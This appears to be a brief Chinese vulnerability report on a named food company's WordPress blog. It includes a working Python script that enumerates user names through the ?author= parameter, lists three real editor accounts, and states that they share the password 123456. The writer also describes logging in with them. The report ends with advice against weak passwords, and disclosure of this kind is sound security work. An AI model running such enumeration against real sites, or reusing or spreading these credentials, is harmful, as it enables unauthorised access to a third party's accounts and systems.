现本来生活的博客站:本来故事,http://foodstory.benlai.com/使用的是wordpress,/wp-admin为后台,?author=$num可遍历用户名
<code>#!/usr/bin/python</p><p> # -*- coding:utf-8 -*-</p><p> import requests</p><p> for i in range(30):</p><p> r = requests.get('http://foodstory.benlai.com/?author='+str(i), allow_redirects=False)</p><p> if r.status_code == 301:</p><p> name = r.headers['Location'][35:]</p><p> print(name)</code>得到用户名
测试发现
<code>zanganping</p><p> wangwenyan</p><p> gaoyan</code>
三位编辑账号存在弱口令123456
登录发现编辑gaoyan的权限似乎比另两个大一点,可能在一定程度上影响前端展现
千万别使用弱口令,预防用户名被遍历啊